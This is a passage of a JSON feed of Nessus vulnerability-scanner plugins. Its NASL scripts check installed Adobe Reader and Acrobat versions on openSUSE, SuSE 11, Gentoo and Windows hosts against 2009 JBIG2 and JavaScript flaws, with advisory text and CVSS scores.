get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"acroread-8.1.4-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:21", "bulletinFamily": "scanner", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_0_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/39906", "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : acroread (acroread-689)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update acroread-689.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(39906);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/10/25 13:36:33\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"openSUSE Security Update : acroread (acroread-689)\");\n script_summary(english:\"Check for the acroread-689 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658, CVE-2009-0927, CVE-2009-0193, CVE-2009-0928,\nCVE-2009-1061, CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"acroread-8.1.4-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:45", "bulletinFamily": "scanner", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_ACROREAD-090325.NASL", "href": "https://www.tenable.com/plugins/nessus/41362", "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 690)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(41362);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/10/25 13:36:35\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n\n script_name(english:\"SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 690)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=488619\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0193.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0658.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0927.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0928.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1061.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1062.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 690.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"acroread-8.1.4-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:40:20", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-200904-17\n(Adobe Reader: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been discovered in Adobe Reader:\n Alin Rad Pop of Secunia Research reported a heap-based buffer overflow\n when processing PDF files containing a malformed JBIG2 symbol\n dictionary segment (CVE-2009-0193).\n A buffer overflow related to a non-JavaScript function call and\n possibly an embedded JBIG2 image stream has been reported\n (CVE-2009-0658).\n Tenable Network Security reported a stack-based buffer overflow that\n can be triggered via a crafted argument to the getIcon() method of a\n Collab object (CVE-2009-0927).\n Sean Larsson of iDefense Labs reported a heap-based buffer overflow\n when processing a PDF file containing a JBIG2 stream with a size\n inconsistency related to an unspecified table (CVE-2009-0928).\n Jonathan Brossard of the iViZ Security Research Team reported an\n unspecified vulnerability related to JBIG2 and input validation\n (CVE-2009-1061).\n Will Dormann of CERT/CC reported a vulnerability lading to memory\n corruption related to JBIG2 (CVE-2009-1062).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n document, possibly leading to the execution of arbitrary code with the\n privileges of the user running the application, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-200904-17.NASL", "href": "https://www.tenable.com/plugins/nessus/36196", "published": "2009-04-21T00:00:00", "title": "GLSA-200904-17 : Adobe Reader: User-assisted execution of arbitrary code", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200904-17.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36196);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2019/08/02 13:32:45\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_bugtraq_id(33751, 34169, 34229);\n script_xref(name:\"GLSA\", value:\"200904-17\");\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n\n script_name(english:\"GLSA-200904-17 : Adobe Reader: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200904-17\n(Adobe Reader: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been discovered in Adobe Reader:\n Alin Rad Pop of Secunia Research reported a heap-based buffer overflow\n when processing PDF files containing a malformed JBIG2 symbol\n dictionary segment (CVE-2009-0193).\n A buffer overflow related to a non-JavaScript function call and\n possibly an embedded JBIG2 image stream has been reported\n (CVE-2009-0658).\n Tenable Network Security reported a stack-based buffer overflow that\n can be triggered via a crafted argument to the getIcon() method of a\n Collab object (CVE-2009-0927).\n Sean Larsson of iDefense Labs reported a heap-based buffer overflow\n when processing a PDF file containing a JBIG2 stream with a size\n inconsistency related to an unspecified table (CVE-2009-0928).\n Jonathan Brossard of the iViZ Security Research Team reported an\n unspecified vulnerability related to JBIG2 and input validation\n (CVE-2009-1061).\n Will Dormann of CERT/CC reported a vulnerability lading to memory\n corruption related to JBIG2 (CVE-2009-1062).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n document, possibly leading to the execution of arbitrary code with the\n privileges of the user running the application, or a Denial of Service.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200904-17\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2009-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Reader users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-8.1.4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-text/acroread\", unaffected:make_list(\"ge 8.1.4\"), vulnerable:make_list(\"lt 8.1.4\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Reader\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:12:32", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote host is earlier\nthan 9.1 / 8.1.4 / 7.1.1. Such versions are reportedly affected by\nmultiple vulnerabilities :\n\n - An integer buffer overflow can be triggered when\n processing a malformed JBIG2 image stream with the\n ", "modified": "2019-11-02T00:00:00", "id": "ADOBE_READER_91.NASL", "href": "https://www.tenable.com/plugins/nessus/35821", "published": "2009-03-11T00:00:00", "title": "Adobe Reader < 9.1 / 8.1.4 / 7.1.1 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35821);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\n \"CVE-2009-0193\", \n \"CVE-2009-0658\", \n \"CVE-2009-0927\", \n \"CVE-2009-0928\",\n \"CVE-2009-1061\", \n \"CVE-2009-1062\"\n );\n script_bugtraq_id(33751, 34169, 34229);\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n script_xref(name:\"EDB-ID\", value:\"8099\");\n script_xref(name:\"Secunia\", value:\"33901\");\n\n script_name(english:\"Adobe Reader < 9.1 / 8.1.4 / 7.1.1 Multiple Vulnerabilities\");\n script_summary(english:\"Check version of Adobe Reader\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The PDF file viewer on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 9.1 / 8.1.4 / 7.1.1. Such versions are reportedly affected by\nmultiple vulnerabilities :\n\n - An integer buffer overflow can be triggered when\n processing a malformed JBIG2 image stream with the\n '/JBIG2Decode' filter. (CVE-2009-0658)\n\n - A vulnerability in the 'getIcon()' JavaScript method of\n a Collab object could allow for remote code execution. \n (CVE-2009-0927)\n\n - Additional vulnerabilities involving handling of JBIG2 \n image streams could lead to remote code execution.\n (CVE-2009-0193, CVE-2009-0928, CVE-2009-1061, \n CVE-2009-1062)\n\nIf an attacker can trick a user into opening a specially crafted PDF\nfile, these flaws can exploited to execute arbitrary code subject to\nthe user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-01\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.adobe.com/support/security/bulletins/apsb09-03.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-04.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader 9.1 / 8.1.4 / 7.1.1 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2009/03/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2009/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_reader_installed.nasl\");\n script_require_keys(\"SMB/Acroread/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\n\ninfo = NULL;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) exit(0, 'The \"SMB/Acroread/Version\" KB item is missing.');\n\nforeach ver (vers)\n{\n if (\n ver &&\n (\n ver =~ \"^[0-6]\\.\" ||\n ver =~ \"^7\\.(0\\.|1\\.0\\.)\" ||\n ver =~ \"^8\\.(0\\.|1\\.[0-3]\\.)\" ||\n ver =~ \"^9\\.0\\.\"\n )\n )\n {\n path = get_kb_item('SMB/Acroread/'+ver+'/Path');\n if (isnull(path)) exit(1, 'The \"SMB/Acroread/'+ver+'/Path\" KB item is missing.');\n\n verui = get_kb_item('SMB/Acroread/'+ver+'/Version_UI');\n if (isnull(verui)) exit(1, 'The \"SMB/Acroread/'+ver+'/Version_UI\" KB item is missing.');\n\n info += ' - ' + verui + ', under ' + path + '\\n';\n }\n}\n\nif (isnull(info)) exit(0, 'The remote host is not affected.');\n\nif (report_verbosity > 0)\n{\n if (max_index(split(info)) > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n\\n'+\n info;\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n}\nelse security_hole(get_kb_item(\"SMB/transport\"));\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:12:11", "bulletinFamily": "scanner", "description": "The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.1 / 8.1.4 / 7.1.1. Such versions are reportedly affected by\nmultiple vulnerabilities :\n\n - An integer buffer overflow can be triggered when\n processing a malformed JBIG2 image stream with the\n ", "modified": "2019-11-02T00:00:00", "id": "ADOBE_ACROBAT_91.NASL", "href": "https://www.tenable.com/plugins/nessus/40803", "published": "2009-08-28T00:00:00", "title": "Adobe Acrobat < 9.1 / 8.1.4 / 7.1.1 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40803);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\",\n \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_bugtraq_id(33751, 34169, 34229);\n script_xref(name:\"TRA\", value:\"TRA-2009-01\");\n script_xref(name:\"EDB-ID\", value:\"8099\");\n script_xref(name:\"Secunia\", value:\"33901\");\n\n script_name(english:\"Adobe Acrobat < 9.1 / 8.1.4 / 7.1.1 Multiple Vulnerabilities\");\n script_summary(english:\"Check version of Adobe Acrobat\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Acrobat on the remote Windows host is affected by\nmultiple vulnerabilities.\" );\n\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 9.1 / 8.1.4 / 7.1.1. Such versions are reportedly affected by\nmultiple vulnerabilities :\n\n - An integer buffer overflow can be triggered when\n processing a malformed JBIG2 image stream with the\n '/JBIG2Decode' filter. (CVE-2009-0658)\n\n - A vulnerability in the 'getIcon()' JavaScript method of\n a Collab object could allow for remote code execution.\n (CVE-2009-0927)\n\n - Additional vulnerabilities involving handling of JBIG2\n image streams could lead to remote code execution.\n (CVE-2009-0193, CVE-2009-0928, CVE-2009-1061,\n CVE-2009-1062)\n\nIf an attacker can trick a user into opening a specially crafted PDF\nfile, he can exploit these flaws to execute arbitrary code subject to\nthe user's privileges.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2009-01\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb09-03.html\"\n );\n\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.adobe.com/support/security/bulletins/apsb09-04.html\"\n );\n\n script_set_attribute(\n attribute:\"solution\",\n value: \"Upgrade to Adobe Acrobat 9.1 / 8.1.4 / 7.1.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Collab.getIcon() Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(20, 119);\n\n script_set_attribute( attribute:'vuln_publication_date', value:'2009/03/18' );\n script_set_attribute( attribute:'patch_publication_date', value:'2009/03/18' );\n script_set_attribute( attribute:'plugin_publication_date', value:'2009/08/28' );\n\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"adobe_acrobat_installed.nasl\");\n script_require_keys(\"SMB/Acrobat/Version\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\n\nversion = get_kb_item(\"SMB/Acrobat/Version\");\nif (isnull(version)) exit(1, \"The 'SMB/Acrobat/Version' KB item is missing.\");\n\nif (\n version =~ \"^[0-6]\\.\" ||\n version =~ \"^7\\.(0\\.|1\\.0\\.)\" ||\n version =~ \"^8\\.(0\\.|1\\.[0-3]\\.)\" ||\n version =~ \"^9\\.0\\.\"\n)\n{\n version_ui = get_kb_item(\"SMB/Acrobat/Version_UI\");\n if (report_verbosity > 0 && version_ui)\n {\n path = get_kb_item(\"SMB/Acrobat/Path\");\n if (isnull(path)) path = \"n/a\";\n\n report = string(\n \"\\n\",\n \" Path : \", path, \"\\n\",\n \" Installed version : \", version_ui, \"\\n\",\n \" Fix : 9.1 / 8.1.4 / 7.1.1\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\nelse exit(0, \"Acrobat \"+version+\" is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:17:46", "bulletinFamily": "scanner", "description": "Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\n(CVE-2009-0658 / CVE-2009-0927 / CVE-2009-0193 / CVE-2009-0928 /\nCVE-2009-1061 / CVE-2009-1062)", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_ACROREAD_JA-090415.NASL", "href": "https://www.tenable.com/plugins/nessus/41365", "published": "2009-09-24T00:00:00", "title": "SuSE 11 Security Update : 